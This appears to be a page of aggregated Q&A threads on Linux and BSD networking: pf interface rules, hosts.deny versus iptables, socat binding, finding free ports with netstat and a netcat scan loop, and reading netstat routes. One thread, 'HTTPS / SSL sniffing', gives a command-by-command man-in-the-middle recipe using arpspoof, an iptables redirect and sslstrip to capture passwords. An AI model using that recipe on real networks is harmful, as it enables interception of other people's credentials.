Dynamic interface list in pf.conf - firewall

I'm looking for a way to add pass in/out rules on interfaces "on the fly". First I tried just adding them one by one to anchors with pfctl, but adding the next rule clears the rule before it ;/
echo "pass in on vlanN proto tcp from any to port 22" | sudo pfctl -a vlan_ssh -f -
I also tried making a table, but it doesn't work with interface names, only IPs.
table <vlan_ssh> = {vlan0, vlan1}

Related

Editing my /etc/host.deny

I'm being trolled by China, and don't know why I can't block their request to my server.
//host.deny
ALL: item.taobao.com
ALL: 117.25.128.*
But when I watch the error log on my webserver tail -f /var/log/apache2/error.log the requests are still being allowed through.
Question: Why isn't my host.deny config working?
hosts.deny will not block every socket connection, only those of apps that rely on hosts.deny, which are ssh, inetd, and a few others. To block all connections you need to use iptables.
It varies from distro to distro but the command line is something like:
iptables -A INPUT -s 117.25.128.0/24 -j DROP
You'll need to use CIDR notation (i.e. a.b.c.d/x) to do ranges. To wildcard the last digit (class C network), change it to a zero and use /24. For the last two, change them to zero and use /16.
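The wildcard-to-CIDR conversion the answer describes, as an added example that is not from the original answer: it turns a hosts.deny-style pattern into the CIDR block iptables wants and prints the DROP rule rather than running it (function names and sample patterns are constructed for this illustration).

```shell
#!/bin/sh
# Added example (not from the original answer): convert the wildcard form that
# hosts.deny accepts (117.25.128.*) into the CIDR form iptables needs, and
# build the matching DROP rule without executing it. Function names and the
# sample patterns are constructed for this illustration.

# wildcard_to_cidr PATTERN: 117.25.128.* -> 117.25.128.0/24, 117.25.*.* -> 117.25.0.0/16,
# a plain address -> /32. Fails (exit 1) if a fixed octet follows a wildcard,
# because a.*.c.* is not a single CIDR block, or if the input is not dotted IPv4.
wildcard_to_cidr() {
    oldifs=$IFS
    set -f                   # keep the shell from expanding * as a glob
    IFS=.; set -- $1
    set +f; IFS=$oldifs
    [ "$#" -eq 4 ] || return 1
    prefix=32; out=""; seen_star=0
    for octet in "$@"; do
        if [ "$octet" = "*" ]; then
            seen_star=1; octet=0; prefix=$((prefix - 8))
        elif [ "$seen_star" -eq 1 ]; then
            return 1
        elif ! [ "$octet" -ge 0 ] 2>/dev/null || [ "$octet" -gt 255 ]; then
            return 1
        fi
        out="${out}${out:+.}${octet}"
    done
    echo "${out}/${prefix}"
}

# drop_rule_for PATTERN: print the iptables rule from the answer for that block.
drop_rule_for() {
    cidr=$(wildcard_to_cidr "$1") || { echo "cannot express '$1' as one CIDR block" >&2; return 1; }
    echo "iptables -A INPUT -s ${cidr} -j DROP"
}

# Demo: the hosts.deny entries from the question plus two edge cases.
for p in '117.25.128.*' '117.25.*.*' '117.25.128.5' 'item.taobao.com' '117.*.128.*'; do
    drop_rule_for "$p" || true
done
```

Hostnames such as item.taobao.com are rejected on purpose: iptables -s takes addresses, so a name has to be resolved to its addresses first.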

socat listen to all IPs assigned to a particular network interface

Does anyone know how I can get socat to listen on all IPs assigned to one particular network interface? I'm not sure if it's even possible.
If I want to bind socat to a particular IP:PORT I always parse the IP info from the output of ip command and then bind socat to it like this:
NETIFC=$(ip -o -4 addr list eth0 | awk '{print $4}' | cut -d/ -f1)
socat -d -d TCP4-LISTEN:1234,fork,bind=${NETIFC} UNIX-CLIENT:/tmp/foo.sock
I thought I would be able to achieve what I'm after by running the socat like this:
socat -d -d TCP4-LISTEN:1234,fork,so-bindtodevice=eth0 UNIX-CLIENT:/tmp/foo.sock
But I believe I'm missing some low-level network programming knowledge and therefore don't quite get what this option is supposed to be doing; I was just plainly hoping it would do what I want it to do, but in fact it binds to ALL network interfaces.
The following port forwarder listens on IP: x.y.z.t:80, without binding to 80 on any other exposed IPs (unlike the bind parameter).
SOCAT_SOCKADDR=x.y.z.t socat TCP-LISTEN:80,reuseaddr,fork,su=nobody TCP:a.b.c.d:80
If an interface has multiple IPs, there is some experimenting to do! In the IPv4, IPv6 case it might be best to use two forwarders. For my current purposes, the code above is sufficient.

How can I find available but unoccupied ports on a Linux box?

Specifically RHEL 6.5
It's a Dev box and we have certain port ranges we are permitted for development use.
...unfortunately, getting a tech's attention to find out what ports are available is like pulling teeth. Would prefer a script or alias that does this so that we don't have to ask all the time. Clues? Is this an iptables command or is it a netstat command or some weird combo? nmap is not available on this machine.
Please don't say this is a Server Fault question. They say it's a programming question. :-|
Definitely a SF question but here we go. From the dev box itself (command line) you should be able to see what ports are in use with the netstat tool.
To see the list of listening ports both UDP and TCP, complete with the program names:
# preferably as root
netstat --listening --program --numeric-ports --protocol=ip -6 -4
From another machine, you can use nmap or a similar tool to see what ports are open/listening by scanning the IP address assigned to the dev box. Before trying this, maybe you should ask for permission. Also, you should consider that the box in question might have firewall rules in place that can thwart your scanning attempts.
To see what firewall rules are in place in the dev box try:
# as root
iptables -nvxL -t filter
# maybe there are NAT rules, redirects to other addresses, etc.
iptables -nvxL -t nat
To see what these iptables options do, try man iptables.
As an example, assuming 172.16.0.1 is the IP address assigned to the dev box, to run nmap in the simplest way possible:
# preferably as root
nmap -v 172.16.0.1
In a few minutes you should see a list of ports/services listening in that relevant box.
Try man nmap and read the documentation for more details.
If you really think this is a programming issue, you can use the netcat tool and program a simple script to do something roughly equivalent to what nmap does.
#!/bin/bash
#
# DISCLAIMER: NOT TESTED -- just an example
# NOTE: This will take many DAYS to complete
HOST=172.16.0.1
for port in $(seq 1 65535)
do
    echo "Trying ${port}..."
    netcat -vvv ${HOST} $port -w 1 -z
done
For every open TCP port you should see a line similar to this:
Connection to 172.16.0.1 23 port [tcp/telnet] succeeded!
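The script the asker wanted, as an added example that is not part of the original answer: it parses the Local Address column of the netstat listing the answer recommends and prints the ports in a permitted range that nothing is listening on. The netstat output embedded below is constructed sample data so it runs offline; function names are assumptions for this illustration.

```shell
#!/bin/sh
# Added example, not from the original answer: list the ports in a permitted
# development range that nothing is currently listening on, by parsing the
# Local Address column of `netstat --listening --numeric-ports` output. The
# netstat output below is constructed sample data so the script runs offline;
# on the real box, feed it the live command from the answer instead.

SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1234/sshd
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      2345/python
tcp6       0      0 :::8080                 :::*                    LISTEN      3456/java
udp        0      0 0.0.0.0:8001            0.0.0.0:*                           4567/dnsmasq'

# listening_ports: print the distinct local port numbers found in netstat-style
# output on stdin. The port is whatever follows the last ':' in column 4, which
# also handles IPv6 forms such as :::8080.
listening_ports() {
    awk '$1 ~ /^(tcp|udp)6?$/ { n = split($4, a, ":"); print a[n] }' | sort -un
}

# free_ports LOW HIGH: ports in [LOW,HIGH] absent from the listening set on stdin.
free_ports() {
    low=$1; high=$2
    listening_ports | awk -v low="$low" -v high="$high" '
        { used[$1] = 1 }
        END { for (p = low; p <= high; p++) if (!(p in used)) print p }'
}

# Demo with the constructed sample and a small permitted range:
# 8000 (tcp) and 8001 (udp) are taken, so 8002-8005 are printed.
printf '%s\n' "$SAMPLE_NETSTAT" | free_ports 8000 8005
```

A port that is free in this listing can still be reserved by firewall rules or grabbed a moment later, so treat the list as a starting point, not a guarantee.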

HTTPS / SSL sniffing

I am using Backtrack5 for this, but I am stuck. I am not able to get the data I want. I am using Ettercap and SSLStrip for this...
Does anyone here have any idea of how to do it?
Idk how you're doing it, but for me ettercap-gtk (the GUI) has always been garbage. I recommend skipping ettercap unless you want easy DNS spoofing, and going another route.
Let me give you some steps, starting with setting up your iptables for this attack (man in the middle, amirite) and enabling ip_forward(ing):
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1337 (Can choose any port you want to send them to)
Now to be the man in the middle: Here we use arpspoof:
arpspoof -i wlan0(or whatever interface) 192.168.1.X(X is the gateway typically .1 or .255)
Then with SSLStrip you can go ahead and ./sslstrip.py -1 1337 -w filename (1337 is the port from earlier, filename is any filename you want to dump the data to)
cat filename (from earlier) and even pipe it to | grep "password" or whatever you're sniffing for, or you can just dump everything. The file will fill up with captured/stripped https data.

How to get the complete destination IP address (x.x.x.x/x) from the netstat command?

Below is the output of the netstat command with the -n & -r options, in which the destination field shows a compacted address (127.1/16). I wanted to know whether there is any way or option for the netstat command to display the entire destination IP (127.1.0.0/16) rather than (127.1/16)?
#netstat -r -n
Destination Gateway Flags Refs Use Mtu Interface
127.0.0.1 127.0.0.1 UH 110 296172 33212 lo0
127.1/16 link#7 UC 2 0 - vlan10
But the command is not showing 127.1.0.0/8, it's showing 127.1/16, which means the whole 127.1.x.x range.
Read up on netmasks: http://en.wikipedia.org/wiki/Subnetwork#IPv4_subnetting
And experiment with them here, to get a better understanding: http://jodies.de/ipcalc
You may want to consider alternatives to just using netstat. "netstat -r" gives the same output as "route". You could also try "ip route show", or "ip route show dev " if you want to see routes going via a particular device/interface. You may also be interested in the output returned by "routel".
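The expansion the answer points to ipcalc for, as an added example that is not from the original answer: it pads the abbreviated destinations netstat -r prints (127.1/16, 10/8) to full dotted-quad CIDR and computes the first and last address the mask covers. Function names are constructed for this illustration.

```shell
#!/bin/sh
# Added example, not from the original answer: expand the abbreviated
# destinations netstat -r prints (127.1/16, 10/8) into full dotted-quad CIDR,
# and show the first and last address the netmask covers. Helper names are
# constructed for this illustration.

# expand_destination DEST: 127.1/16 -> 127.1.0.0/16; a bare address is a /32 host route.
expand_destination() {
    case "$1" in
        default) echo "0.0.0.0/0"; return ;;        # route tables print the default route as a word
        */*)     addr=${1%/*}; prefix=${1#*/} ;;
        *)       addr=$1; prefix=32 ;;              # host route, as for 127.0.0.1 in the listing
    esac
    oldifs=$IFS; IFS=.; set -- $addr; IFS=$oldifs
    while [ "$#" -lt 4 ]; do set -- "$@" 0; done    # pad the missing octets with zeros
    echo "$1.$2.$3.$4/$prefix"
}

# ip_to_int / int_to_ip: dotted quad <-> 32-bit integer, for the range arithmetic.
ip_to_int() {
    oldifs=$IFS; IFS=.; set -- $1; IFS=$oldifs
    echo $(( ($1 << 24) + ($2 << 16) + ($3 << 8) + $4 ))
}
int_to_ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# network_range DEST: "127.1/16" -> "127.1.0.0 - 127.1.255.255"
network_range() {
    full=$(expand_destination "$1")
    addr=${full%/*}; prefix=${full#*/}
    mask=$(( (4294967295 << (32 - prefix)) & 4294967295 ))
    net=$(( $(ip_to_int "$addr") & mask ))
    bcast=$(( net | (~mask & 4294967295) ))
    echo "$(int_to_ip "$net") - $(int_to_ip "$bcast")"
}

# Demo: the two destinations from the netstat listing plus a /24 and a bare /8.
for d in 127.0.0.1 127.1/16 192.168.1.0/24 10/8; do
    printf '%-16s %-18s %s\n' "$d" "$(expand_destination "$d")" "$(network_range "$d")"
done
```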
